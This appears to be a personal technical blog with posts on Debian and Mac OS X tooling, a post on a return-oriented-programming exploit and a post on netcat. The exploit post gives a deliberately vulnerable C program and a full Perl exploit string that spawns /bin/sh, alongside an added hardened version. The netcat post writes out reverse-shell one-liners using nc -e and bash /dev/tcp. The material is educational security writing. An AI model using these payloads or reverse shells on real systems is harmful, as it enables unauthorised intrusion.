Jabberd on Debian

When we set up “jabberd” on the latest Ubuntu/Debian, we cannot find the jabber.cfg file that the Debian administration guide (http://www.debian-administration.org/articles/42) refers to.

Instead of modifying jabber.cfg, we need to modify the /etc/default/jabberd14 file. In that file, just set the HOSTNAME field to your host.

This setup resolves the “Internal Delivery Error” problem.

Blogging

Ah… my server was down for about 4 months, and I also deleted (by mistake) most of my old posts. Thankfully, I could recover some old posts from my Google Buzz.

Thanks Google Buzz!

Compiling binutils on Mac OS X

Recently, I had to compile binutils on Mac OS X, and figured that some people might benefit from this summary. Here are some facts to know when compiling binutils on Mac OS X.

1. Format string patch
Basically, you will not be able to build it (under the latest Mac OS X and Xcode) because of warning messages such as:

warning: format not a string literal and no format arguments.

This is due to gcc's format-string vulnerability checking. I checked the latest version of binutils (2.20.1), but the format-string patch is still not done. I tried to patch it manually, but there were too many spots! So just use the --disable-werror option to ignore the warnings.

2. Libiberty option
By default, the libiberty headers are not installed into the $(prefix)/include directory. Since I use the libiberty libraries, I need to add the --enable-install-libiberty option.

3. 32-bit compilation
By default, binutils is compiled as a 64-bit binary on my Mac (the build simply follows the machine's architecture). Since my OCaml compiler only supports 32-bit on Mac, I have to compile binutils in 32-bit mode as well, using CC="gcc -arch i386" CXX="g++ -arch i386".

4. Target option
If you build without a target option, your binutils (including objdump) can only handle Mach-O binaries. Thus I give a target option to deal with other interesting binaries: --enable-targets=i386-elf,i386-pe.

All in all, this is my configure command :D

./configure CC="gcc -arch i386" CXX="g++ -arch i386" --disable-werror --enable-install-libiberty --enable-targets=i386-elf,i386-pe

Advanced Return-Oriented Exploit

This is a brief introduction to a cool little buffer overflow exploitation technique under the following conditions: the stack is not executable, the stack address is randomized, and the libc address is also randomized. In other words, we cannot simply use return-to-stack or return-to-libc.

The vulnerable program I am going to use is a modified version of gera's in [1]. Here we do not have stack canary protection, but I am going to make it much harder by modifying the code a little: adding an exit system call and enabling stack and libc address randomization (ASLR). The modified version is shown below:

  #include <ctype.h>   /* toupper */
  #include <string.h>
  #include <stdlib.h>
  #include <stdio.h>

  int func(char *msg) {
      char buf[80];
      strcpy(buf, msg);          /* unbounded copy: overflows buf when msg is longer than 79 bytes */
      buf[0] = toupper(buf[0]);
      strcpy(msg, buf);          /* copies back through msg, whose value the first strcpy may have overwritten */
      printf("Caps: %s\n", msg);
      exit(1);                   /* func never returns, so its return address is never used */
  }

  int main(int argv, char** argc) {  /* parameter names are swapped relative to the usual argc/argv */
      func(argc[1]);
  }


1. Vulnerability

There is a classic strcpy vulnerability in func. The two consecutive strcpy calls let us write arbitrary values to an arbitrary address: the first strcpy overflows buf and overwrites the value of msg (which lies above buf in the stack frame), and the second strcpy then writes through the modified msg. Note that overwriting the return address of func is not enough, because func ends with an exit system call and never returns. This is clearer in the disassembled version of the program:

  080484b4 <func>:
   80484b4:       55                      push   %ebp
   80484b5:       89 e5                   mov    %esp,%ebp
   80484b7:       83 ec 58                sub    $0x58,%esp
   80484ba:       8b 45 08                mov    0x8(%ebp),%eax
   80484bd:       89 44 24 04             mov    %eax,0x4(%esp)
   80484c1:       8d 45 b0                lea    -0x50(%ebp),%eax
   80484c4:       89 04 24                mov    %eax,(%esp)
   80484c7:       e8 04 ff ff ff          call   80483d0 <strcpy@plt>
   80484cc:       0f b6 45 b0             movzbl -0x50(%ebp),%eax
   80484d0:       0f be c0                movsbl %al,%eax
   80484d3:       89 04 24                mov    %eax,(%esp)
   80484d6:       e8 d5 fe ff ff          call   80483b0 <toupper@plt>
   80484db:       88 45 b0                mov    %al,-0x50(%ebp)
   80484de:       8d 45 b0                lea    -0x50(%ebp),%eax
   80484e1:       89 44 24 04             mov    %eax,0x4(%esp)
   80484e5:       8b 45 08                mov    0x8(%ebp),%eax
   80484e8:       89 04 24                mov    %eax,(%esp)
   80484eb:       e8 e0 fe ff ff          call   80483d0 <strcpy@plt>
   80484f0:       8b 45 08                mov    0x8(%ebp),%eax
   80484f3:       89 44 24 04             mov    %eax,0x4(%esp)
   80484f7:       c7 04 24 00 86 04 08    movl   $0x8048600,(%esp)
   80484fe:       e8 dd fe ff ff          call   80483e0 <printf@plt>
   8048503:       c7 04 24 01 00 00 00    movl   $0x1,(%esp)
   804850a:       e8 e1 fe ff ff          call   80483f0 <exit@plt>
  0804850f <main>:
   804850f:       8d 4c 24 04             lea    0x4(%esp),%ecx
   8048513:       83 e4 f0                and    $0xfffffff0,%esp
   8048516:       ff 71 fc                pushl  -0x4(%ecx)
   8048519:       55                      push   %ebp
   804851a:       89 e5                   mov    %esp,%ebp
   804851c:       51                      push   %ecx
   804851d:       83 ec 14                sub    $0x14,%esp
   8048520:       8b 41 04                mov    0x4(%ecx),%eax
   8048523:       83 c0 04                add    $0x4,%eax
   8048526:       8b 00                   mov    (%eax),%eax
   8048528:       89 04 24                mov    %eax,(%esp)
   804852b:       e8 84 ff ff ff          call   80484b4 <func>
   8048530:       83 c4 14                add    $0x14,%esp
   8048533:       59                      pop    %ecx
   8048534:       5d                      pop    %ebp
   8048535:       8d 61 fc                lea    -0x4(%ecx),%esp
   8048538:       c3                      ret


2. Observation and Strategy

We can only modify a single memory region, and it must not be the return address because of the exit system call. There are several candidate spots, including .dtors and the GOT. In this example I am going to overwrite the GOT entry of printf. The GOT is part of the program image itself, so its address is not randomized.

Now we can hijack the control flow when printf is called, so the next step is to determine where to jump. We cannot simply return into libc because its address is randomized (we are not going to brute-force it here). However, we know that the code section's addresses are fixed, so we are going to use the return-oriented programming technique introduced by Hovav [2]. In this problem we can only use the code section of this small program, so only a very small number of gadgets is available.

The return-oriented program that we are going to design runs as follows: 1) retrieve the address of libc's strcpy function from the GOT, 2) compute the offset from the strcpy function to the system function, 3) obtain the address of the system function from steps 1 and 2, 4) set up the stack to hold a pointer to the “/bin/sh” string, 5) jump to the system function using an indirect call (call *%eax).


3. Gadgets

We are going to use the following four gadgets, found in the code section, to perform the exploitation.

1)

  0x80485a2 <__libc_csu_init+82>: add    $0xc,%esp
  0x80485a5 <__libc_csu_init+85>: pop    %ebx
  0x80485a6 <__libc_csu_init+86>: pop    %esi
  0x80485a7 <__libc_csu_init+87>: pop    %edi
  0x80485a8 <__libc_csu_init+88>: pop    %ebp
  0x80485a9 <__libc_csu_init+89>: ret

2)

  0x804838c <_init+44>:   pop    %eax
  0x804838d <_init+45>:   pop    %ebx
  0x804838e <_init+46>:   leave
  0x804838f <_init+47>:   ret

3)

  0x80485ce <__do_global_ctors_aux+30>:   add    0xf475fff8(%ebx),%eax
  0x80485d4 <__do_global_ctors_aux+36>:   add    $0x4,%esp
  0x80485d7 <__do_global_ctors_aux+39>:   pop    %ebx
  0x80485d8 <__do_global_ctors_aux+40>:   pop    %ebp
  0x80485d9 <__do_global_ctors_aux+41>:   ret

4)

  0x80484af <frame_dummy+31>:     call   *%eax


4. Final Exploit

Using the above four gadgets, I introduce the following exploit. Note that this is not just a simple return-oriented programming exploit; several techniques are involved:
1) It dynamically retrieves the system function's address via the GOT.
2) It changes the ebp register to point to the bss section so that we can control esp and ebp continuously.
3) It sets up the stack address to have enough space for the system call.

First, the second gadget sets up the eax and ebx values that the third gadget uses to compute the system function's address. The result of the "add 0xf475fff8(%ebx),%eax" instruction must be the address of the system function in libc. Specifically, 0xf475fff8(%ebx) must point to strcpy's GOT entry, so that strcpy's address in libc is added to the value already in the eax register.

Changing the ebp register in the first gadget is the trickiest part. In the first gadget, we set ebp to point to the writable bss section (more precisely, beyond the bss section). Since the address 0x804a2e8 is in a writable region, we can place the values for ebp and esp there. In the second gadget, the leave instruction sets esp from ebp. Thus after the second gadget, both ebp and esp point to addresses in the bss section.

The final exploit in perl is shown below:

  1. print "\xa2\x85\x04\x08" .                         # First gadget
  2. "AAAAAAAA" .                                       # dummy
  3. "\xe8\xa2\x04\x08" .                               # set ebp, pointing to line 9 of this exploit string
  4. "\x8c\x83\x04\x08" .                               # Second gadget
  5. "\xc0\x52\xfc\xff" . "\x14\xa0\x8e\x13AAAA" . "/bin/sh;" . "A"x48 .
  6. "\x10\xa0\x04\x08" .                               # GOT entry address of printf
  7. "\x30\xa0\x04\x08"x0xa0 .                          # dummy
  8. "\xce\x85\x04\x08" .                               # Third gadget
  9. "\x30\xa0\x04\x08"x0x2 .                           # dummy
  10. "\x30\xa0\x04\x08" .                              # dummy ebp
  11. "\xaf\x84\x04\x08" .                              # call *%eax (fourth gadget)
  12. "\x30\xa0\x04\x08";

I also attach the binary file for people who are interested. :)

5. Conclusion

There are many possible ways of bypassing ASLR protections. Here I presented a way to apply the return-oriented programming technique in a very limited environment: small code space, randomized stack, and randomized libc.
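As an added example (not part of the original post), here is the same func() written with bounded copies: the input length is checked against both the caller's buffer and buf, so neither copy can overrun, and an over-long message is rejected instead of reaching the saved frame or, through the second copy, the GOT. The names func_safe, bounded_len and run_case are this example's own, and the inputs are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 80

/* Length of s, never scanning past cap bytes (s may be unterminated). */
static size_t bounded_len(const char *s, size_t cap) {
    size_t n = 0;
    while (n < cap && s[n] != '\0')
        n++;
    return n;
}

/* Hardened counterpart of the post's func() (hypothetical name). msg_cap is
 * the size of the caller's buffer; the copy is refused (-1) unless msg is a
 * terminated string that fits in buf, so neither copy can overrun. */
int func_safe(char *msg, size_t msg_cap) {
    char buf[BUF_SIZE];
    size_t len = bounded_len(msg, msg_cap);
    if (len >= msg_cap || len >= sizeof buf)
        return -1;                          /* too long or unterminated */
    memcpy(buf, msg, len + 1);              /* len + 1 <= BUF_SIZE */
    buf[0] = (char)toupper((unsigned char)buf[0]);
    memcpy(msg, buf, len + 1);              /* same length back to the caller */
    printf("Caps: %s\n", msg);
    return 0;
}

/* Constructed input: n lowercase 'a's in a 200-byte buffer. Returns the first
 * byte after the call ('A' when accepted) or -1 when the input was refused. */
int run_case(size_t n) {
    char msg[200];
    if (n >= sizeof msg)
        n = sizeof msg - 1;
    memset(msg, 'a', n);
    msg[n] = '\0';
    if (func_safe(msg, sizeof msg) != 0)
        return -1;
    return msg[0];
}

int main(void) {
    printf("79 bytes -> %d\n", run_case(79));   /* accepted: 'A' (65) */
    printf("80 bytes -> %d\n", run_case(80));   /* refused: -1 */
    return 0;
}
```

Build and load-time hardening complements the fix: a PIE binary removes the fixed code and GOT addresses the gadgets above rely on, and full RELRO (-Wl,-z,relro,-z,now) makes the GOT read-only before main runs.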

gnuplot on Mac OS X (snow leopard)

When we install gnuplot on Mac OS X from the source code, we encounter this strange error message:

Undefined symbols:
"_rl_forced_update_display", referenced from:
_restore_prompt in command.o
"_rl_ding", referenced from:
_alert in mouse.o
"_history_list", referenced from:
_write_history_list in history.o
"_rl_complete_with_tilde_expansion", referenced from:
_rl_complete_with_tilde_expansion$non_lazy_ptr in plot.o
"_rl_reset_after_signal", referenced from:
_main in plot.o

This error is due to the readline library in Mac OS X.
If you look at /usr/lib/libreadline.dylib, the symlink points at a library file that we do not recognize (it was not familiar to me). Thus we can solve this problem by installing libreadline from source and pointing the symlink at it. In my case:

sudo ln -s /usr/local/lib/libreadline.6.1.dylib /usr/lib/libreadline.dylib

objdump (disassemble) in Mac OS X

There are two possible ways to do objdump in Mac OS X: 1) install GNU binutils; 2) use otool.

1) Install GNU binutils from the source or from MacPorts.

2) Use otool, the Mac OS X native utility. I summarize the usage of otool below:

disassemble the text section (= objdump -j .text -d <file>):

otool -tV <file>

disassemble a section (= objdump -j <section> -d <file>); otool takes the segment name followed by the section name, e.g. __TEXT __text:

otool -V -s <segment> <section> <file>

print out the shared library dependencies (= ldd <file>):

otool -L <file>

print out the data section (= objdump -j .data -s <file>):

otool -dv <file>

Netcat on Mac OS X

netcat (nc) is a utility for arbitrary TCP and UDP connections and listens. According to the nc manual, the -e option specifies a filename to exec after connect. Thus, in general, we can easily make a reverse shell with this command:

nc <addr> <port> -e /bin/sh

However, nc on Mac does not have the -e option.
Instead, Mac's bash has network redirection (/dev/tcp or /dev/udp) enabled. Thus, instead of using nc for a reverse shell, we can simply use this command:

/bin/bash 0</dev/tcp/addr/port 1>&0 2>&0

Note that this technique will not work on default Debian machines: you have to enable bash network redirection to use it.

Useful reference: http://shudder.daemonette.org/source/BashNP-Guide.txt

Instruction Reference Manual in Mac

Mac OS X's Xcode ships instruction reference manuals for x86, ARM, and PowerPC by default:

open /Library/Application\ Support/Shark/Helpers/